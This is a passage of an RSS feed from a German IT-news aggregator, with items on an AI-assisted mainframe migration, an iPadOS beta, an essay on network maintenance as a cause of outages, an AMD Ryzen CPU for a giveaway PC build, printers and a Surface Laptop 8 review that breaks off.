<p class="wp-block-paragraph">While AI played a big part, there’s danger in overestimating the power of AI during a migration project, Jayaprakasam says, and organizations need to follow best practices for IT migration.</p>



<p class="wp-block-paragraph">“If you minimize the importance of communication, risk planning, and business alignment because you have AI, you tend to fail,” he says. “But as long as you play all those cards and recognize AI was the missing piece to the puzzle, then you have a much better chance of winning.”</p>



<p class="wp-block-paragraph">Deluxe also used a cross-functional tiger team to look at the various options available to accelerate reverse engineering, including AI tools from OpenAI, Anthropic, as well as GitHub Copilot throughout the project.</p>



<p class="wp-block-paragraph">In addition, AI was useful to dig through the mainframe code and understand what needed to be updated, Jayaprakasam says. Organizations sitting on decades-old code often no longer have people who understand it.</p>



<p class="wp-block-paragraph">“I always tell people that the code remembers what the organization forgot, because with people going and changing, people don’t remember what we wrote in the code, but the code remembers,” he adds. “The amazing tool that was missing before is we didn’t have an interpreter who understood what the code remembered. Now with AI, you have the interpreter.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[iPadOS 26.6 Developer Beta 5 Now Available for Developers]]></title>
<description><![CDATA[Apple has released iPadOS 26.6 developer beta 5 for registered developers. The latest testing update arrives one week after beta 4 and focuses mainly on fixing bugs, improving security, and preparing iPadOS 26.6 for its public release.



Developers can download the beta directly through the Sett...]]></description>
<link>https://tsecurity.de/de/3666599/ios-mac-os/ipados-266-developer-beta-5-now-available-for-developers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666599/ios-mac-os/ipados-266-developer-beta-5-now-available-for-developers/</guid>
<pubDate>Tue, 14 Jul 2026 01:53:57 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released iPadOS 26.6 developer beta 5 for registered developers. The latest testing update arrives one week after beta 4 and focuses mainly on fixing bugs, improving security, and preparing iPadOS 26.6 for its public release.



Developers can download the beta directly through the Settings app on an eligible iPad. Since this remains pre-release software, users should back up their device before installing it.



How to Update to iPadOS 26.6 Developer Beta 5




Open the Settings app on your iPad.



Go to General.



Tap Software Update.



Select Beta Updates.



Choose iPadOS 26 Developer Beta.



Return to the previous screen and tap Update Now.




Keep the iPad connected to Wi-Fi and make sure it has enough battery before beginning the installation. The developer beta option requires an Apple Account enrolled in the developer program.



All Changes in iPadOS 26.6 Developer Beta 5



No major new features have been discovered in iPadOS 26.6 developer beta 5 so far. The update appears to include smaller improvements across the system.




Bug fixes: The beta addresses software issues reported during earlier rounds of testing and should offer a more stable experience.



Performance improvements: Developers may notice smoother animations, faster app responses, and better system performance on supported iPad models.



Security updates: The release includes background security changes designed to protect user data and system components.



Battery and thermal improvements: Apple may have adjusted power management to reduce battery drain and excessive heating reported in previous beta builds.



App testing support: Developers can use the release to check how their apps perform before the final version of iPadOS 26.6 becomes available.




Apple has not announced when iPadOS 26.6 will reach the public, although the development cycle appears to be approaching its final stages.



If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA['The precision and quality of the print finish are exceptional': We love the beginner-friendly Anycubic Kobra S1 Combo 3D printer — and it's got a massive discount right now]]></title>
<description><![CDATA[The high-speed, beginner-friendly Anycubic Kobra S1 Combo is one of the best 3D printers we've ever tested.]]></description>
<link>https://tsecurity.de/de/3666070/it-nachrichten/the-precision-and-quality-of-the-print-finish-are-exceptional-we-love-the-beginner-friendly-anycubic-kobra-s1-combo-3d-printer-and-its-got-a-massive-discount-right-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666070/it-nachrichten/the-precision-and-quality-of-the-print-finish-are-exceptional-we-love-the-beginner-friendly-anycubic-kobra-s1-combo-3d-printer-and-its-got-a-massive-discount-right-now/</guid>
<pubDate>Mon, 13 Jul 2026 19:47:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The high-speed, beginner-friendly Anycubic Kobra S1 Combo is one of the best 3D printers we've ever tested.]]></content:encoded>
</item>
<item>
<title><![CDATA[Routine maintenance as a failure vector in modern networks]]></title>
<description><![CDATA[Early in my consulting career, I assumed maintenance windows reduced risk. After all, the purpose of planned maintenance is to improve reliability, apply fixes and prevent future outages. That assumption changed after I participated in what should have been a routine infrastructure change.



Eve...]]></description>
<link>https://tsecurity.de/de/3664719/it-security-nachrichten/routine-maintenance-as-a-failure-vector-in-modern-networks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664719/it-security-nachrichten/routine-maintenance-as-a-failure-vector-in-modern-networks/</guid>
<pubDate>Mon, 13 Jul 2026 11:08:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Early in my consulting career, I assumed maintenance windows reduced risk. After all, the purpose of planned maintenance is to improve reliability, apply fixes and prevent future outages. That assumption changed after I participated in what should have been a routine infrastructure change.</p>



<p>Every pre-check passed. Device health looked normal. High-availability synchronization was complete. Monitoring showed no obvious concerns. Yet shortly after the change, users began reporting application failures.</p>



<p>The root cause was not a failed upgrade, hardware fault or software defect. The maintenance activity exposed a dependency elsewhere in the traffic path that nobody had considered.</p>



<p>Since then, I have seen similar patterns repeatedly across enterprise environments. The change itself was rarely the problem. The problem was the assumption that the change was isolated.</p>



<p>Planned maintenance is intended to reduce risk, but in practice, it often introduces risk into an otherwise stable network.</p>



<p>Many production incidents result from routine tasks such as firewall updates, DNS changes, certificate renewals, routing adjustments, load balancer failovers, WAF updates, switch upgrades or software patches, rather than dramatic failures.</p>



<p>The reality is that “routine” does not equate to “low risk.” It simply means the activity has been performed before, not that the current environment will respond the same way.</p>



<p>Modern networks have become too interconnected for maintenance to be treated as a simple device-level task. A change to one control point can expose a dependency elsewhere in the traffic path. A firewall update can affect asymmetric return traffic. A DNS change can shift users to a data center where persistence is not aligned. A load balancer failover can expose stale ARP or MAC learning issues. A certificate renewal can cause an inspection or TLS negotiation to fail in the backend. A WAF update can block application behavior that was never visible in testing.</p>



<p>Failures rarely stem from the maintenance activity itself, but rather from the assumption that the change is isolated.</p>



<h2 class="wp-block-heading">Why routine changes still cause outages</h2>



<p>In traditional network operations, the unit of change was often a device: upgrade a switch, modify a router, add a firewall rule, renew a certificate or reboot an appliance. That model worked better when application traffic paths were simpler, and dependencies were easier to understand.</p>



<p>Today, a single user transaction may cross DNS, global traffic management, WAN routing, data center switching, firewalls, load balancers, TLS inspection points, WAF policies, API gateways and backend application tiers. Each layer may make an independent decision about availability, security, routing or session handling.</p>



<p>This creates a risky maintenance pattern. Teams often validate only the component they changed, not the complete traffic flow before and after the change. Devices may appear healthy, configurations may load correctly and all checks may pass, yet users can still experience failures due to a changed dependency somewhere in the end-to-end path.</p>



<p>Google’s Site Reliability Engineering (SRE) guidance highlights that changes remain one of the most common sources of service disruption, which is why mature organizations invest heavily in change validation, rollback planning and observability. <a href="https://sre.google/sre-book/">The SRE book</a> provides extensive discussion of change management, reliability engineering and operational risk in large-scale environments.</p>



<p>For this reason, maintenance windows should be evaluated as both operational events and potential failure vectors.</p>



<h2 class="wp-block-heading">Common failure points during maintenance</h2>



<p>One common issue is state mismatch. Firewalls, load balancers, NAT devices and application delivery controllers often maintain connection or session state. During failover, reboot or path change, existing flows may not survive even if the standby device becomes active as designed. New connections may succeed while long-lived sessions fail. In other cases, traffic may enter through one device and return through another, causing stateful inspection to drop packets that appear invalid.</p>



<p>Asymmetric routing is another frequent cause. A routing change may look harmless from a Layer 3 perspective, but if the forward and return paths traverse different firewalls or inspection zones, applications can fail intermittently. The network may still be “up,” but the security policy no longer sees the full conversation.</p>



<p>Layer 2 behavior is also underestimated. In highly available data center designs, MAC learning, ARP cache behavior, VLAN tagging, port channels and first-hop gateway behavior can determine whether traffic moves cleanly after a failover. A device may successfully assume an active role, but upstream switches or firewalls may still forward traffic toward the old path until tables age out or are refreshed.</p>



<p>DNS and GSLB changes introduce a different class of risk. Teams often test name resolution, but resolution is only the first step. The more important question is where users are being sent and whether that destination is ready to handle production traffic.</p>



<p><a href="https://www.internetsociety.org/resources/deploy360/dns/">DNS resilience guidance published by the Internet Society</a> emphasizes that successful name resolution alone does not guarantee application availability, particularly when multiple infrastructure dependencies exist behind the DNS response.</p>



<p>If global traffic management shifts users from one data center to another, the receiving site must have aligned firewall rules, load balancer configuration, health monitors, certificates, persistence behavior, routing advertisements and backend capacity. Otherwise, DNS sends users to a site that is not actually ready.</p>



<p>Certificate maintenance can also break more than the browser-facing endpoint. In many environments, TLS is terminated, re-encrypted, inspected or validated across multiple hops. Renewing a certificate on the external virtual server may not address backend certificates, intermediate chains, SNI behavior, cipher compatibility or trust stores used by inspection devices. The maintenance task may be described as a certificate renewal, but the real dependency is end-to-end TLS negotiation.</p>



<p>Security policy maintenance creates another risk. WAFs, IPSs, DDoS protection systems, bot defense platforms and firewall policies are designed to block abnormal behavior. But during updates, tuning changes or signature refreshes, they can also block legitimate application traffic if policy enforcement is not validated against real transaction patterns.</p>



<p>This is especially true for APIs, where small differences in headers, methods, payload structure or authentication flows can trigger unexpected enforcement.</p>



<h2 class="wp-block-heading">The test environment problem</h2>



<p>Many teams rely on pre-checks and test environments, but these controls are often less effective than they seem.</p>



<p>Pre-checks confirm device reachability, interface status, route existence, pool member availability and HA health. While necessary, these checks do not ensure production traffic will survive a path change because they focus on infrastructure rather than transaction validation.</p>



<p>Test environments rarely mirror production. Production environments involve real user volume, client diversity, DNS caching behavior, firewall states, certificates, backend latency and complex dependencies. A failover that succeeds in a lab may behave very differently in the real world.</p>



<p>This does not render testing useless, but test results should not be considered proof of production safety. They provide evidence, not a guarantee.<br><br>This challenge aligns with broader <a href="https://www.nist.gov/cyberframework">operational resilience guidance from the NIST Cybersecurity Framework</a>, which emphasizes continuous monitoring, validation and recovery planning as critical operational capabilities.</p>



<p>A stronger maintenance process starts with mapping the traffic path before the window. For critical applications, teams should understand the normal ingress path, egress path, firewall zones, NAT points, load balancer virtual servers, DNS or GSLB decision points, TLS termination points, persistence requirements and backend dependencies.</p>



<p>The next step is defining failure expectations. What happens to existing sessions if a firewall is rebooted? Should source MAC, floating IP, ARP or upstream forwarding behavior change during a load balancer failover? How long will cached clients continue to access the old site after a DNS shift? Which clients and inspection devices validate the certificate chain when a certificate is replaced?</p>



<p>These questions should be addressed before the maintenance window, not during an outage.</p>



<p>Pre-checks should include both control-plane and data-plane evidence. Control-plane checks confirm configuration, synchronization, device health, routing tables, interface status and object availability. Data-plane checks validate real traffic movement: TCP handshakes, TLS negotiation, HTTP status codes, API responses, session persistence, source NAT behavior and return-path consistency.</p>



<p>During the change, monitoring should focus on symptoms that expose traffic failure early. Device CPU and interface status are useful, but they are not enough. Teams should also watch connection resets, denied firewall logs, WAF violation spikes, pool member selection failures, DNS answer changes, TCP retransmissions, backend 5xx errors and synthetic transaction results.</p>



<p>Rollback planning must also be precise. Simply rolling back a configuration is often insufficient. If a DNS record changes, cached clients may continue using the previous answer. If a firewall state table is cleared, restoring the rule does not recover active sessions. If failover alters forwarding behavior, upstream devices may require ARP refresh, route reconvergence or manual validation.</p>



<p>An effective rollback plan should identify lost state, persistent caches and the evidence required to confirm recovery.</p>



<h2 class="wp-block-heading">Treating maintenance as a resilience exercise</h2>



<p>The objective is not to make maintenance overly complex or bureaucratic. The objective is to avoid underestimating its risks.</p>



<p>Every maintenance window is a controlled opportunity to test whether the network behaves as specified by the architecture.</p>



<p>If failover is part of the design, maintenance should verify failover behavior. If a secondary data center is expected to handle traffic, maintenance should demonstrate that it can process real transactions. If security policies are updated, maintenance should prove that legitimate traffic is still allowed. If certificates are renewed, maintenance should validate the complete TLS path, not just the public endpoint.</p>



<p><a href="https://uptimeinstitute.com/resources">Industry outage studies published by the Uptime</a> Institute consistently show that human error and process failures remain significant contributors to downtime. Their annual outage research continues to highlight the role of operational processes and maintenance activities in service disruptions.<br><br>Maintenance windows provide an opportunity to identify those weaknesses before they become customer-facing incidents.</p>



<p>This requires closer collaboration between network, security, application and operations teams. Network engineers may own routing or load-balancing changes, but application teams understand transaction flows. Security teams understand inspection and enforcement behavior. Operations teams often see user-impacting symptoms first.</p>



<p>Treating maintenance as a shared traffic event rather than a device event reduces blind spots.</p>



<p>Routine maintenance will always involve some risk. However, the greatest risk is the false confidence that the term ‘routine’ conveys.</p>



<p>Modern networks fail in the spaces between systems: between DNS and load balancing, between firewalls and routing, between TLS inspection and application behavior, between HA design and actual forwarding state. Maintenance exposes those spaces.</p>



<p>For that reason, network teams should view every maintenance window as more than a checklist. It is a live test of architecture, operational discipline and production resilience.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die CPU der Höllenmaschine HMX 6: AMD Ryzen 9 9950X3D2 Dual Edition]]></title>
<description><![CDATA[Der AMD Ryzen 9 9950X3D2 Dual Edition ist der erste Desktop-Prozessor weltweit, bei dem beide CPU-Chiplets (CCDs) mit AMDs 3D-V-Cache-Technik ausgestattet sind. Die AM5-CPU richtet sich sowohl an ambitionierte Gamer als auch an professionelle Anwender mit hohen Leistungsanforderungen.



Die auf ...]]></description>
<link>https://tsecurity.de/de/3664640/it-nachrichten/die-cpu-der-hoellenmaschine-hmx-6-amd-ryzen-9-9950x3d2-dual-edition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664640/it-nachrichten/die-cpu-der-hoellenmaschine-hmx-6-amd-ryzen-9-9950x3d2-dual-edition/</guid>
<pubDate>Mon, 13 Jul 2026 10:32:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Der <a href="https://www.amd.com/de/products/processors/desktops/ryzen/9000-series/amd-ryzen-9-9950x3d2-dual-edition.html" target="_blank" rel="noreferrer noopener">AMD Ryzen 9 9950X3D2 Dual Edition</a> ist der erste Desktop-Prozessor weltweit, bei dem beide <a href="https://www.pcwelt.de/article/1199965/was-ist-ein-chiplet-begriff-erklaert.html" target="_blank" rel="noreferrer noopener">CPU-Chiplets (CCDs)</a> mit AMDs 3D-V-Cache-Technik ausgestattet sind. Die AM5-CPU richtet sich sowohl an ambitionierte Gamer als auch an professionelle Anwender mit hohen Leistungsanforderungen.</p>



<p>Die auf der Zen-5-Architektur basierende CPU verfügt über 16 Kerne und kann dank <a href="https://de.wikipedia.org/wiki/Simultaneous_Multithreading" target="_blank" rel="noreferrer noopener">Simultaneous Multithreading (SMT)</a> bis zu 32 Threads gleichzeitig verarbeiten. Der Basistakt beträgt 4,3 GHz, während der maximale Boost-Takt bei bis zu 5,6 GHz liegt. Die TDP gibt AMD mit 200 Watt an. </p>



<h2 class="wp-block-heading toc">Geköpfte und wassergekühlte CPU</h2>



<p>Noch mehr Leistung und eine höhere Stabilität entlocken wir dem Prozessor, indem wir ihn von <a href="https://www.youtube.com/c/der8auer" target="_blank" rel="noreferrer noopener">Roman @der8auer Hartung</a> professionell köpfen lassen. Gekühlt wird der AMD-Prozessor dann mit dem CPU-Block <a href="https://www.thermal-grizzly.com/mycro-direct-die-pro/s-tg-my-dd-p-rgb-amd-v1">Thermal Grizzly Mycro Direct-Die Pro</a>, den wir in der HMX 6 an eine Custom-Wasserkühlung anschließen. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a54a27d8a77c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Thermal-Grizzly-Mycro-Direct-Die-Pro.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Thermal Grizzly Mycro Direct-Die Pro" class="wp-image-3186822" width="1200" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thermal Grizzly </p></div>



<p>Der High-End-Kühler wurde speziell für den Direct-Die-Betrieb entwickelt, passt also perfekt zu unserem geköpften HMX-6-Prozessor. Der Kühler verfügt über eine vernickelte Kupferbodenplatte mit optimierter Mikrofinnenstruktur, die eine besonders effiziente Wärmeabfuhr gewährleistet. Und natürlich ist auch eine adressierbare RGB-Beleuchtung mit an Bord.</p>



<h2 class="wp-block-heading toc">Optimale Lastverteilung dank doppeltem 3D-V-Cache</h2>



<p>Das herausragende Merkmal des 9950X3D2 ist der <a href="https://www.pcwelt.de/article/1524671/amd-ryzen-9-7950x3d-test-gaming-cpu.html" target="_blank" rel="noreferrer noopener">3D-V-Cache</a> auf beiden CCDs. Im Gegensatz zu bisherigen X3D-Modellen, bei denen nur ein Chiplet über den zusätzlichen Cache verfügte, profitieren nun beide Chiplets davon. Dadurch wird die Lastverteilung zwischen den CCDs optimiert, was insbesondere in Spielen sowie in cacheintensiven Anwendungen für eine konstantere und höhere Leistung sorgt.</p>



<p>Im Gaming-Bereich ist der Ryzen 9 9950X3D2 der aktuell schnellste Prozessor der Welt. Gegenüber dem bisherigen Ryzen 9 9950X3D sind – abhängig vom jeweiligen Spiel – Leistungszuwächse von rund 5 bis 10 Prozent möglich. Auch professionelle Anwendungen wie 3D-Rendering, Softwareentwicklung, Simulationen oder KI-Workloads profitieren von der erweiterten Cache-Ausstattung, wenngleich die Leistungsgewinne hier in der Regel moderater ausfallen. Der <a href="https://www.amazon.de/dp/B0GTRTJSNZ?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">AMD Ryzen 9 9950X3D2 Dual Edition</a> kostet aktuell knapp 900 Euro, der <a href="https://www.aquatuning.com/wasserkuehlung/custom-wasserkuehlung/cpu-kuehler/amd/thermal-grizzly-amd-mycro-direct-die-pro-rgb-v1" target="_blank" rel="noreferrer noopener">Thermal Grizzly Mycro Direct-Die Pro</a> schlägt mit rund 130 Euro zu Buche und das Köpfen des 9950X3D2 durch Roman ist unbezahlbar.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a54a27d8b1b1"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/1000008085-sz.png?w=1200" alt="AMD Ryzen 9 9950X3D2 Dual Edition on a pedestal" class="wp-image-3111046" width="1200" height="799" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">AMD</p></div>



<h2 class="wp-block-heading toc">So gewinnen Sie die HMX 6</h2>



<p>Auch dieses Jahr verlosen wir die Höllenmaschine unter allen Teilnehmern</p>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn" href="https://www.pcwelt.de/article/3179491/hmx-6-gewinnspiel.html" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Gewinnen Sie hier die HMX 6</a></div>


<h2 class="wp-block-heading toc">Wie Sie die HMX 6 verfolgen können</h2>



<p>In den kommenden Wochen folgen weitere Inhalte rund um die Höllenmaschine 6 auf <a href="https://www.youtube.com/playlist?list=PLVC_WMwVwvSiOOgt6D9mN4Ud71M_uLFsS">YouTube</a>, <a href="https://www.instagram.com/pcwelt/">Instagram</a>, <a href="https://www.tiktok.com/@pcwelt.de">TikTok</a>, <a href="https://www.facebook.com/pcwelt/reels/">Facebook </a>und natürlich auf <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">pcwelt.de</a>. Wenn Sie nichts verpassen wollen, sollten Sie den kostenlosen <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter abonnieren</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[It Took 90 Seconds for This $100 Portable Photo Printer to Totally Change My July 4th Party]]></title>
<description><![CDATA[Liene's latest printer is tiny yet mighty and easy enough to use for everyone to enjoy.]]></description>
<link>https://tsecurity.de/de/3663745/it-nachrichten/it-took-90-seconds-for-this-100-portable-photo-printer-to-totally-change-my-july-4th-party/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663745/it-nachrichten/it-took-90-seconds-for-this-100-portable-photo-printer-to-totally-change-my-july-4th-party/</guid>
<pubDate>Sun, 12 Jul 2026 21:01:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Liene's latest printer is tiny yet mighty and easy enough to use for everyone to enjoy.]]></content:encoded>
</item>
<item>
<title><![CDATA[Big Tech is Acting Kind of Dodgy At the Moment]]></title>
<description><![CDATA[Author: ColdFusion - Bewertung: 51x - Views:765 Visit https://brilliant.org/coldfusion to try Brilliant’s tutor for free and get a 20% off an annual subscription. 

For the longest time, big tech was seen as the perpetual money printer but now things have changed. The AI frenzy has drained free c...]]></description>
<link>https://tsecurity.de/de/3662952/videos/big-tech-is-acting-kind-of-dodgy-at-the-moment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662952/videos/big-tech-is-acting-kind-of-dodgy-at-the-moment/</guid>
<pubDate>Sun, 12 Jul 2026 10:02:28 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: ColdFusion - Bewertung: 51x - Views:765 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/nZmoq_XJW6Y?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Visit https://brilliant.org/coldfusion to try Brilliant’s tutor for free and get a 20% off an annual subscription. <br />
<br />
For the longest time, big tech was seen as the perpetual money printer but now things have changed. The AI frenzy has drained free cash flow and driven these companies to employ interesting accounting practices. <br />
<br />
Watch or listen to ColdFusion on Spotify: https://open.spotify.com/show/1YEwCKoRz8fEDqheXB6UJ1<br />
<br />
Additional music by Loxe:<br />
https://www.instagram.com/loxetheproducer/?hl=en<br />
https://open.spotify.com/artist/4Jb1EAbXK4BpbQopoeMWKT<br />
<br />
ColdFusion Music: <br />
<br />
https://www.youtube.com/@ColdFusionmusic<br />
http://burnwater.bandcamp.com   <br />
<br />
ColdFusion Socials: <br />
<br />
https://discord.gg/coldfusion<br />
https://facebook.com/ColdFusionTV <br />
https://twitter.com/ColdFusion_TV <br />
https://instagram.com/coldfusiontv<br />
<br />
Created by: Dagogo Altraide<br />
Producers: Tawsif Akkas, Dagogo Altraide<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Is this the open source printer of our dreams? Raspberry Pi-powered, DRM-free 'Open Printer' inkjet could be the perfect solution if it ever sees the light of day]]></title>
<description><![CDATA[Open Tools develops a repairable open source printer using Raspberry Pi hardware, challenging DRM restrictions while facing cartridge and production challenges.]]></description>
<link>https://tsecurity.de/de/3662479/it-nachrichten/is-this-the-open-source-printer-of-our-dreams-raspberry-pi-powered-drm-free-open-printer-inkjet-could-be-the-perfect-solution-if-it-ever-sees-the-light-of-day/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662479/it-nachrichten/is-this-the-open-source-printer-of-our-dreams-raspberry-pi-powered-drm-free-open-printer-inkjet-could-be-the-perfect-solution-if-it-ever-sees-the-light-of-day/</guid>
<pubDate>Sun, 12 Jul 2026 00:32:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Open Tools develops a repairable open source printer using Raspberry Pi hardware, challenging DRM restrictions while facing cartridge and production challenges.]]></content:encoded>
</item>
<item>
<title><![CDATA[Surface Laptop 8 for Business im Test: Ein Laptop von gestern zum Preis von morgen]]></title>
<description><![CDATA[Mark Hachman / Foundry



Auf einen Blick



Pro




Altbekannter Surface Laptop



Der neue Blickschutz funktioniert oft gut



Die “Voice Focus”-Funktion ist ziemlich nützlich




Kontra




Unangemessen hoher Preis



Die gleiche alte Bauweise




Fazit



Der Surface Laptop 8 for Business von...]]></description>
<link>https://tsecurity.de/de/3661207/it-security-nachrichten/surface-laptop-8-for-business-im-test-ein-laptop-von-gestern-zum-preis-von-morgen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661207/it-security-nachrichten/surface-laptop-8-for-business-im-test-ein-laptop-von-gestern-zum-preis-von-morgen/</guid>
<pubDate>Sat, 11 Jul 2026 06:06:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-09-um-20.02.20.png?w=1024" alt="Surface Laptop 8" class="wp-image-4195198" width="1024" height="645" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<h2 class="wp-block-heading">Auf einen Blick</h2>



<h3 class="wp-block-heading">Pro</h3>



<ul class="wp-block-list">
<li>Altbekannter Surface Laptop</li>



<li>Der neue Blickschutz funktioniert oft gut</li>



<li>Die “Voice Focus”-Funktion ist ziemlich nützlich</li>
</ul>



<h3 class="wp-block-heading">Kontra</h3>



<ul class="wp-block-list">
<li>Unangemessen hoher Preis</li>



<li>Die gleiche alte Bauweise</li>
</ul>



<h3 class="wp-block-heading">Fazit</h3>



<p>Der Surface Laptop 8 for Business von Microsoft kommt einem sofort bekannt vor. Herzstück ist ein leistungsstarker Intel Core Ultra Series 300 (Panther Lake)-Prozessor. Doch leider ist das Gerät derart teuer, dass sich ein Kauf angesichts der wenigen neuen Funktionen kaum rechtfertigen lässt.</p>



<p>Zum ersten Mal seit Jahren war ich nicht begeistert, ein neues Surface-Modell zu testen. Und auch nach dem ausführlichen Test bin ich eher enttäuscht.</p>



<p>Dabei hat der Surface Laptop 8th Edition (oder Surface Laptop 8) for Business zwei echte Pluspunkte vorzuweisen: ein Upgrade auf Intels hervorragende Prozessoren der Core Ultra 300-Serie (Panther Lake) und einen einigermaßen nützlichen Sichtschutz.</p>



<p>Letzterer kann den Bildschirm auf Knopfdruck abdunkeln und unkenntlich machen. Leider hat Microsoft aber am traditionellen Aufschlag für Surface-Geräte festgehalten. Diese Preisgestaltung treibt die Kosten des Laptops in unattraktive Höhen.</p>



<p>Fairerweise muss man sagen, dass es sich hierbei um einen Laptop der Business-Klasse handelt. Eine Consumer-Version dieses Surface Laptops wird noch in diesem Jahr folgen, ausgestattet mit einem Qualcomm Snapdragon X2 Elite Extreme-Chip.</p>



<p>Basierend auf meinen eigenen Tests beider Chips lässt sich sagen, dass der hier verbaute Intel Core Ultra 300-Prozessor den Snapdragon leicht übertreffen wird. Dies gilt zumindest für die Grafikleistung und möglicherweise auch für die Akkulaufzeit.</p>



<p>Einige Surface-Fans könnten einwenden, dass Microsoft das Design des Laptops bereits optimiert hat. Andere könnten die Optik als altbacken kritisieren. Ich gehöre definitiv zur zweiten Gruppe. Ich muss mittlerweile auf Klebezettel zurückgreifen, die ich an der Unterseite der von mir getesteten Surface-Laptops anbringe. Warum? Sie sind im Alltag sonst praktisch nicht voneinander zu unterscheiden.</p>


